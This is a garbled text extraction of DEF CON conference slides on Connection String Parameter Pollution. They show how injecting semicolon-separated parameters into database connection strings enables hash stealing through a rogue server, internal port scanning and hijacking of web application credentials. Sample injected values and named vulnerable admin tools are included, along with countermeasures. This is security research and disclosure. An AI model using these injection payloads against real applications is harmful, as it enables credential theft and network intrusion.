chema alonso informática 64 - def con...other databases • mysql – does not support integrated...
TRANSCRIPT
![Page 1: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/1.jpg)
pp
Chema AlonsoChema AlonsoInformática 64Informática 64
![Page 2: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/2.jpg)
Connection StringsConnection Strings
• Define the way an application connects toDefine the way an application connects todata repository
• There are connection strings for:• There are connection strings for:– Relational Databases (MSSQL, Oracle, MySQL,…)
LDAP Di i– LDAP Directories
– Files
– Etc…
![Page 3: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/3.jpg)
Databases Connection StringsDatabases Connection Strings
Data Source = myServerAddress;Data Source = myServerAddress;
Initial Catalog = myDataBase;Initial Catalog myDataBase;
User Id = myUsername;
Password = myPassword;
![Page 4: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/4.jpg)
Google HackingGoogle Hacking
![Page 5: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/5.jpg)
Google HackingGoogle Hacking
![Page 6: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/6.jpg)
UDL (Universal Data Links) FilesUDL (Universal Data Links) Files
![Page 7: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/7.jpg)
CredentialsCredentials
Operating System Accounts Database CredentialsOperating System Accounts
Data Source = myServerAddress;
Database Credentials
Data Source = myServerAddress;
Initial Catalog = myDataBase;
User Id = myUsername;
Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Integrated Security = SSPI/True/Yes;
Password = myPassword;
Integrated Security = No;SSPI/True/Yes;
![Page 8: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/8.jpg)
Users autheticated by Web AppWeb application manages the login process
Syslogins Connection string
1.‐Web applicatonconnects using itscredentials to thecredentials to thedatabase.
2.‐ Asks user logini f ti
Customusers table
information.
3.‐ Checks logininformation about info
Select id from users
stored in custom userstable.
Database Engine App running on Web Server
![Page 9: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/9.jpg)
Users autheticated by DatabaseDatabase engine manages the login process
1.‐Web applicationasks for credentials.
2 i i
Syslogins Connection string
2.‐ A connection stringis composed with thecredentials to connectto the database.
3.‐ Roles and permitsare limited by the usersed in the connectionused in the connection
string
Database Engine App running on Web Server
![Page 10: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/10.jpg)
Connection String AttacksConnection String Attacks
• It´s possible to inject parameters into connectionIt s possible to inject parameters into connectionstrings using semi colons as separators
Data Source = myServerAddress;
I iti l C t l D t BInitial Catalog = myDataBase;
Integrated Security = NO;
User Id = myUsername;
Password = myPassword; Encryption = Off;
![Page 11: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/11.jpg)
ConnectionStringBuilerConnectionStringBuiler
• Available in .NET Framework 2.0
• Build secure connection strings using parameters
• It´s not possible to inject into the connection string
![Page 12: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/12.jpg)
Are people aware of this?Are people aware of this?
![Page 13: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/13.jpg)
Connection String Parameter PollutionConnection String Parameter Pollution
• The goal is to inject parameters in the connection e goa s to ject pa a ete s t e co ect ostring, whether they exist or not
• Had duplicated a parameter, the last value wins
• This behavior allows attackers to re‐write completly the connection string, therefore to manipulate the way the appliation will work and how should be the it authenticated
![Page 14: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/14.jpg)
Pollutionable BehaviorPollutionable Behavior
Param1=Value A Param2=Value B Param1=Value C Param2=Value DParam1=Value A Param2=Value B Param1=Value C Param2=Value D
DBConnection Object
Param1Param1
Param2
![Page 15: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/15.jpg)
What can be done with CSPP?Rewrite a parameter
Data Source=DB1 UID=sa Data Source=DB2password=Pwnd!Data Source=DB1 UID=sa Data Source=DB2password=Pwnd!
DBConnection Object
DataSourceDataSource
UID
password
![Page 16: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/16.jpg)
Scanning the DMZScanning the DMZ
Development
Database 1FinnacialDatabase
Test Database
ForgottenDatabase
Web appI t t Production
DataSource
FW vulnerable to CSPP
Internet ProductionDatabase
![Page 17: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/17.jpg)
Port Scanning a ServerPort Scanning a Server
DataSource
DB1,80DB1,21
DataSource
FW
Web appvulnerable to CSPP
Internet ProductionDatabase
DB1,25
DB1 1445to CSPPServer
DB1,1445
![Page 18: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/18.jpg)
What can be done with CSPP?ddAdd a parameter
Data Source=DB1 UID=sa Integrated Security=Truepassword=Pwnd!
DBConnection Object
Data Source=DB1 UID=sa Integrated Security=Truepassword=Pwnd!
DataSource
UID
passwordpassword
![Page 19: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/19.jpg)
CSPP Attack 1: Hash stealingCSPP Attack 1: Hash stealing
1 ‐ Run a Rogue Server on an accessibl IP address:1. Run a Rogue Server on an accessibl IP address:
Rogue_Server
2 Activate a sniffer to catch the login process2.‐ Activate a sniffer to catch the login process
Cain/Wireshark
3.‐ Duplicate Data Source parameter
Data_Source=Rogue_Server
4.‐ Force Windows Integrated Authentication
Integrated Security=trueg y
![Page 20: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/20.jpg)
CSPP Attack 1: Robo de HashCSPP Attack 1: Robo de Hash
Data source = SQL2005; initial catalog = db1;Data source SQL2005; initial catalog db1;Integrated Security=no; user id=+’User_Value’+; Password=+’Password Value’+;Password=+ Password_Value +;
D t SQL2005 i iti l t l db1Data source = SQL2005; initial catalog = db1;Integrated Security=no; user id= ;Data S R SSource=Rogue_Server;
Password=;Integrated Security=True;
![Page 21: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/21.jpg)
CSSP 1:ASP.NET Enterprise ManagerCSSP 1:ASP.NET Enterprise Manager
![Page 22: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/22.jpg)
CSPP Attack 2: Port ScanningCSPP Attack 2: Port Scanning
1 ‐ Duplicate the Data Source parameter setting1. Duplicate the Data Source parameter settingon it the Target server and target port to bescannedscanned.
Data_Source=Target_Server,target_Port
2 Check the error messages:2.‐ Check the error messages:
‐ No TCP Connection ‐> Port is opened
‐ No SQL Server ‐> Port is closed
‐ SQL Server ‐> Invalid Password
![Page 23: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/23.jpg)
CSPP Attack 2: Port ScanningCSPP Attack 2: Port Scanning
Data source = SQL2005; initial catalog = db1;Data source SQL2005; initial catalog db1;Integrated Security=no; user id=+’User_Value’+; Password=+’Password Value’+;Password=+ Password_Value +;
D t SQL2005 i iti l t l db1Data source = SQL2005; initial catalog = db1;Integrated Security=no; user id= ;Data S T t S T t P tSource=Target_Server, Target_Port;
Password=;Integrated Security=True;
![Page 24: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/24.jpg)
CSPP 2: myLittleAdminCSPP 2: myLittleAdmin
Port is OpenedPort is Opened
![Page 25: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/25.jpg)
CSPP 2: myLittleAdminCSPP 2: myLittleAdmin
Port is ClosedPort is Closed
![Page 26: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/26.jpg)
CSPP Attack 3: Hijacking Web CredentialsCSPP Attack 3: Hijacking Web Credentials
1 ‐ Duplicate Data Source parameter to the1. Duplicate Data Source parameter to thetarget SQL Server
Data Source=Target ServerData_Source=Target_Server
2.‐ Force Windows Authentication
Integrated Security=true
3.‐ Application pool in which the web app ispp p pprunning on will send its credentials in order tolog in to the database engine.g g
![Page 27: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/27.jpg)
CSPP Attack 3: Hijacking Web CredentialsCSPP Attack 3: Hijacking Web Credentials
Data source = SQL2005; initial catalog = db1;Data source SQL2005; initial catalog db1;Integrated Security=no; user id=+’User_Value’+; Password=+’Password Value’+;Password=+ Password_Value +;
D t SQL2005 i iti l t l db1Data source = SQL2005; initial catalog = db1;Integrated Security=no; user id= ;Data S T t SSource=Target_Server;
Password=;Integrated Security=true;
![Page 28: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/28.jpg)
CSPP Attack 3: Web Data AdministratorCSPP Attack 3: Web Data Administrator
![Page 29: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/29.jpg)
CSPP Attack 3: l d / l kmyLittleAdmin/myLittleBackup
![Page 30: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/30.jpg)
CSPP Attack 3: ASP.NET Enterprise ManagerCSPP Attack 3: ASP.NET Enterprise Manager
![Page 31: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/31.jpg)
Other DatabasesOther Databases
• MySQL– Does not support Integrated security– It´s possible to manipulate the behavior of the web application,
although• Port Scanning• Connect to internal/testing/for developing Databases
• Oracle supports integrated authority running on Windows d UNIX/Liand UNIX/Linux servers
– It´s possible to perform all described attacks• Hash stealingP t S i• Port Scanning
• Hijacking Web credentials– Also it´s possible to elevate a connection to sysdba in order to
shutdown/startup an instanceshutdown/startup an instance
![Page 32: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/32.jpg)
![Page 33: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/33.jpg)
myLittleAdmin/myLittleBackupmyLittleAdmin/myLittleBackup
myLittleTools released a secury advisory and a patch about this
![Page 34: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/34.jpg)
ASP.NET Enterprise ManagerASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is “abandoned”, but it´s been used in a lot of web Control Panels.
• Fix the code yourselfFix the code yourself
![Page 35: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/35.jpg)
ASP.NET Enterprise ManagerASP.NET Enterprise Manager• ASP.NET Enterprise Manager is “abandoned”, but it´s been used in a lot of web Control Panelsbeen used in a lot of web Control Panels.
h lf• Fix the code yourself
![Page 36: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/36.jpg)
ASP.NET Web Data AdmistratorASP.NET Web Data Admistrator
ASP Web Data Administrator is secure in CodePlex web site, but not in Microsoft web site where is been published an unsecure old version
![Page 37: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/37.jpg)
CountermeasuresCountermeasures
• Harden your firewalla de you e a– Outbound connections
• Harden your internal accountsy– Web application– Web server– Database Engine
• Use ConnectionStringBuilder
• Filter the ;)
![Page 38: Chema Alonso Informática 64 - DEF CON...Other Databases • MySQL – Does not support Integrated security – It´s possible to manipulate the behavior of the web application,](https://reader033.vdocuments.site/reader033/viewer/2022041803/5e525cb71d662722e106d0da/html5/thumbnails/38.jpg)
Questions?Questions?
ContactoChema Alonso [email protected]://www.informatica64.comhttp://[email protected]
AuthorsChema Alonso Manuel Fernández “The Sur”Alejandro Martín BailónAntonio Guzmán